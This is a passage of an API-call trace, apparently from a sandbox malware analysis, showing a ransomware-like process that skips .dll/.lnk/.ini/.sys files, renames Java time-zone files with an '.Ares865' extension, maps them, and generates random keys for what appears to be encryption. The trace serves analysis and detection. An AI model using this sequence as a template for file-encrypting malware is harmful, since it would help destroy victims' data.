lstrcpyW (in: lpString1=0x2cce460, lpString2="Gambier" | out: lpString1="Gambier") returned="Gambier" [0133.280] lstrlenW (lpString="Gambier") returned 7 [0133.280] lstrlenW (lpString="Ares865") returned 7 [0133.280] lstrlenW (lpString=".dll") returned 4 [0133.280] lstrcmpiW (lpString1="Gambier", lpString2=".dll") returned 1 [0133.280] lstrlenW (lpString=".lnk") returned 4 [0133.280] lstrcmpiW (lpString1="Gambier", lpString2=".lnk") returned 1 [0133.280] lstrlenW (lpString=".ini") returned 4 [0133.280] lstrcmpiW (lpString1="Gambier", lpString2=".ini") returned 1 [0133.280] lstrlenW (lpString=".sys") returned 4 [0133.280] lstrcmpiW (lpString1="Gambier", lpString2=".sys") returned 1 [0133.280] lstrlenW (lpString="Gambier") returned 7 [0133.280] lstrlenW (lpString="bak") returned 3 [0133.280] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Gambier.Ares865") returned 63 [0133.280] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Gambier" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\gambier"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Gambier.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\gambier.ares865"), dwFlags=0x1) returned 1 [0133.282] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Gambier.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\gambier.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.282] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0133.282] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.283] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.283] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.283] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x350, lpName=0x0) returned 0x170 [0133.285] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x350) returned 0x190000 [0133.286] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.287] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.287] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.287] lstrcpyW (in: lpString1=0x2cce460, lpString2="Guadalcanal" | out: lpString1="Guadalcanal") returned="Guadalcanal" [0133.287] lstrlenW (lpString="Guadalcanal") returned 11 [0133.287] lstrlenW (lpString="Ares865") returned 7 [0133.287] lstrcmpiW (lpString1="alcanal", lpString2="Ares865") returned -1 [0133.287] lstrlenW (lpString=".dll") returned 4 [0133.287] lstrcmpiW (lpString1="Guadalcanal", lpString2=".dll") returned 1 [0133.287] lstrlenW (lpString=".lnk") returned 4 [0133.287] lstrcmpiW (lpString1="Guadalcanal", lpString2=".lnk") returned 1 [0133.287] lstrlenW (lpString=".ini") returned 4 [0133.287] lstrcmpiW (lpString1="Guadalcanal", lpString2=".ini") returned 1 [0133.287] lstrlenW (lpString=".sys") returned 4 [0133.287] lstrcmpiW (lpString1="Guadalcanal", lpString2=".sys") returned 1 [0133.288] lstrlenW (lpString="Guadalcanal") returned 11 [0133.288] lstrlenW (lpString="bak") returned 3 [0133.288] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Guadalcanal.Ares865") returned 67 [0133.288] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Guadalcanal" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\guadalcanal"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Guadalcanal.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\guadalcanal.ares865"), dwFlags=0x1) returned 1 [0133.289] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Guadalcanal.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\guadalcanal.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.289] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0133.289] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.290] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.290] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.290] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x350, lpName=0x0) returned 0x170 [0133.292] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x350) returned 0x190000 [0133.293] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.294] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.294] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.294] lstrcpyW (in: lpString1=0x2cce460, lpString2="Guam" | out: lpString1="Guam") returned="Guam" [0133.294] lstrlenW (lpString="Guam") returned 4 [0133.294] lstrlenW (lpString="Ares865") returned 7 [0133.294] lstrlenW (lpString=".dll") returned 4 [0133.294] lstrlenW (lpString=".lnk") returned 4 [0133.294] lstrlenW (lpString=".ini") returned 4 [0133.294] lstrlenW (lpString=".sys") returned 4 [0133.294] lstrlenW (lpString="Guam") returned 4 [0133.294] lstrlenW (lpString="bak") returned 3 [0133.295] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Guam.Ares865") returned 60 [0133.295] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Guam" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\guam"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Guam.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\guam.ares865"), dwFlags=0x1) returned 1 [0133.296] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Guam.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\guam.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.296] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0133.296] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.297] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.297] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.297] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x350, lpName=0x0) returned 0x170 [0133.299] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x350) returned 0x190000 [0133.300] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.300] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.300] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.301] lstrcpyW (in: lpString1=0x2cce460, lpString2="Honolulu" | out: lpString1="Honolulu") returned="Honolulu" [0133.301] lstrlenW (lpString="Honolulu") returned 8 [0133.301] lstrlenW (lpString="Ares865") returned 7 [0133.301] lstrcmpiW (lpString1="onolulu", lpString2="Ares865") returned 1 [0133.301] lstrlenW (lpString=".dll") returned 4 [0133.301] lstrcmpiW (lpString1="Honolulu", lpString2=".dll") returned 1 [0133.301] lstrlenW (lpString=".lnk") returned 4 [0133.301] lstrcmpiW (lpString1="Honolulu", lpString2=".lnk") returned 1 [0133.301] lstrlenW (lpString=".ini") returned 4 [0133.301] lstrcmpiW (lpString1="Honolulu", lpString2=".ini") returned 1 [0133.301] lstrlenW (lpString=".sys") returned 4 [0133.301] lstrcmpiW (lpString1="Honolulu", lpString2=".sys") returned 1 [0133.301] lstrlenW (lpString="Honolulu") returned 8 [0133.301] lstrlenW (lpString="bak") returned 3 [0133.302] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Honolulu.Ares865") returned 64 [0133.302] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Honolulu" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\honolulu"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Honolulu.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\honolulu.ares865"), dwFlags=0x1) returned 1 [0133.303] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Honolulu.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\honolulu.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.303] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=105) returned 1 [0133.303] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.304] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.304] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.304] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x370, lpName=0x0) returned 0x170 [0133.306] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x370) returned 0x190000 [0133.307] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.307] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.307] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.308] lstrcpyW (in: lpString1=0x2cce460, lpString2="Johnston" | out: lpString1="Johnston") returned="Johnston" [0133.308] lstrlenW (lpString="Johnston") returned 8 [0133.308] lstrlenW (lpString="Ares865") returned 7 [0133.308] lstrcmpiW (lpString1="ohnston", lpString2="Ares865") returned 1 [0133.308] lstrlenW (lpString=".dll") returned 4 [0133.308] lstrcmpiW (lpString1="Johnston", lpString2=".dll") returned 1 [0133.308] lstrlenW (lpString=".lnk") returned 4 [0133.308] lstrcmpiW (lpString1="Johnston", lpString2=".lnk") returned 1 [0133.308] lstrlenW (lpString=".ini") returned 4 [0133.308] lstrcmpiW (lpString1="Johnston", lpString2=".ini") returned 1 [0133.308] lstrlenW (lpString=".sys") returned 4 [0133.308] lstrcmpiW (lpString1="Johnston", lpString2=".sys") returned 1 [0133.308] lstrlenW (lpString="Johnston") returned 8 [0133.308] lstrlenW (lpString="bak") returned 3 [0133.308] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Johnston.Ares865") returned 64 [0133.308] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Johnston" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\johnston"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Johnston.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\johnston.ares865"), dwFlags=0x1) returned 1 [0133.313] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Johnston.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\johnston.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.313] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27) returned 1 [0133.313] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.314] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.314] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.314] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x320, lpName=0x0) returned 0x170 [0133.316] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x320) returned 0x190000 [0133.317] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.317] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.317] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.318] lstrcpyW (in: lpString1=0x2cce460, lpString2="Kiritimati" | out: lpString1="Kiritimati") returned="Kiritimati" [0133.318] lstrlenW (lpString="Kiritimati") returned 10 [0133.318] lstrlenW (lpString="Ares865") returned 7 [0133.318] lstrcmpiW (lpString1="itimati", lpString2="Ares865") returned 1 [0133.318] lstrlenW (lpString=".dll") returned 4 [0133.318] lstrcmpiW (lpString1="Kiritimati", lpString2=".dll") returned 1 [0133.318] lstrlenW (lpString=".lnk") returned 4 [0133.318] lstrcmpiW (lpString1="Kiritimati", lpString2=".lnk") returned 1 [0133.318] lstrlenW (lpString=".ini") returned 4 [0133.318] lstrcmpiW (lpString1="Kiritimati", lpString2=".ini") returned 1 [0133.318] lstrlenW (lpString=".sys") returned 4 [0133.318] lstrcmpiW (lpString1="Kiritimati", lpString2=".sys") returned 1 [0133.318] lstrlenW (lpString="Kiritimati") returned 10 [0133.318] lstrlenW (lpString="bak") returned 3 [0133.319] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Kiritimati.Ares865") returned 66 [0133.319] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Kiritimati" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\kiritimati"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Kiritimati.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\kiritimati.ares865"), dwFlags=0x1) returned 1 [0133.320] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Kiritimati.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\kiritimati.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.320] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=89) returned 1 [0133.320] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.321] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.321] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.321] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x360, lpName=0x0) returned 0x170 [0133.323] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x360) returned 0x190000 [0133.324] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.325] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.325] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.325] lstrcpyW (in: lpString1=0x2cce460, lpString2="Kosrae" | out: lpString1="Kosrae") returned="Kosrae" [0133.325] lstrlenW (lpString="Kosrae") returned 6 [0133.325] lstrlenW (lpString="Ares865") returned 7 [0133.325] lstrlenW (lpString=".dll") returned 4 [0133.325] lstrcmpiW (lpString1="Kosrae", lpString2=".dll") returned 1 [0133.325] lstrlenW (lpString=".lnk") returned 4 [0133.325] lstrcmpiW (lpString1="Kosrae", lpString2=".lnk") returned 1 [0133.325] lstrlenW (lpString=".ini") returned 4 [0133.325] lstrcmpiW (lpString1="Kosrae", lpString2=".ini") returned 1 [0133.325] lstrlenW (lpString=".sys") returned 4 [0133.325] lstrcmpiW (lpString1="Kosrae", lpString2=".sys") returned 1 [0133.325] lstrlenW (lpString="Kosrae") returned 6 [0133.325] lstrlenW (lpString="bak") returned 3 [0133.326] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Kosrae.Ares865") returned 62 [0133.326] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Kosrae" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\kosrae"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Kosrae.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\kosrae.ares865"), dwFlags=0x1) returned 1 [0133.327] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Kosrae.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\kosrae.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.328] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=85) returned 1 [0133.328] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.328] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.328] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.329] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x360, lpName=0x0) returned 0x170 [0133.331] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x360) returned 0x190000 [0133.331] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.332] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.332] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.333] lstrcpyW (in: lpString1=0x2cce460, lpString2="Kwajalein" | out: lpString1="Kwajalein") returned="Kwajalein" [0133.333] lstrlenW (lpString="Kwajalein") returned 9 [0133.333] lstrlenW (lpString="Ares865") returned 7 [0133.333] lstrcmpiW (lpString1="ajalein", lpString2="Ares865") returned -1 [0133.333] lstrlenW (lpString=".dll") returned 4 [0133.333] lstrcmpiW (lpString1="Kwajalein", lpString2=".dll") returned 1 [0133.333] lstrlenW (lpString=".lnk") returned 4 [0133.333] lstrcmpiW (lpString1="Kwajalein", lpString2=".lnk") returned 1 [0133.333] lstrlenW (lpString=".ini") returned 4 [0133.333] lstrcmpiW (lpString1="Kwajalein", lpString2=".ini") returned 1 [0133.333] lstrlenW (lpString=".sys") returned 4 [0133.333] lstrcmpiW (lpString1="Kwajalein", lpString2=".sys") returned 1 [0133.333] lstrlenW (lpString="Kwajalein") returned 9 [0133.333] lstrlenW (lpString="bak") returned 3 [0133.333] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Kwajalein.Ares865") returned 65 [0133.333] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Kwajalein" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\kwajalein"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Kwajalein.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\kwajalein.ares865"), dwFlags=0x1) returned 1 [0133.335] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Kwajalein.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\kwajalein.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.335] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=89) returned 1 [0133.335] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.336] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.336] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.336] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x360, lpName=0x0) returned 0x170 [0133.338] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x360) returned 0x190000 [0133.339] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.339] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.339] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.340] lstrcpyW (in: lpString1=0x2cce460, lpString2="Majuro" | out: lpString1="Majuro") returned="Majuro" [0133.340] lstrlenW (lpString="Majuro") returned 6 [0133.340] lstrlenW (lpString="Ares865") returned 7 [0133.340] lstrlenW (lpString=".dll") returned 4 [0133.340] lstrcmpiW (lpString1="Majuro", lpString2=".dll") returned 1 [0133.340] lstrlenW (lpString=".lnk") returned 4 [0133.340] lstrcmpiW (lpString1="Majuro", lpString2=".lnk") returned 1 [0133.340] lstrlenW (lpString=".ini") returned 4 [0133.340] lstrcmpiW (lpString1="Majuro", lpString2=".ini") returned 1 [0133.340] lstrlenW (lpString=".sys") returned 4 [0133.340] lstrcmpiW (lpString1="Majuro", lpString2=".sys") returned 1 [0133.340] lstrlenW (lpString="Majuro") returned 6 [0133.340] lstrlenW (lpString="bak") returned 3 [0133.340] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Majuro.Ares865") returned 62 [0133.340] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Majuro" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\majuro"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Majuro.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\majuro.ares865"), dwFlags=0x1) returned 1 [0133.342] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Majuro.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\majuro.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.342] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=77) returned 1 [0133.343] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.343] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.343] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.344] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x350, lpName=0x0) returned 0x170 [0133.346] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x350) returned 0x190000 [0133.346] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.347] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, 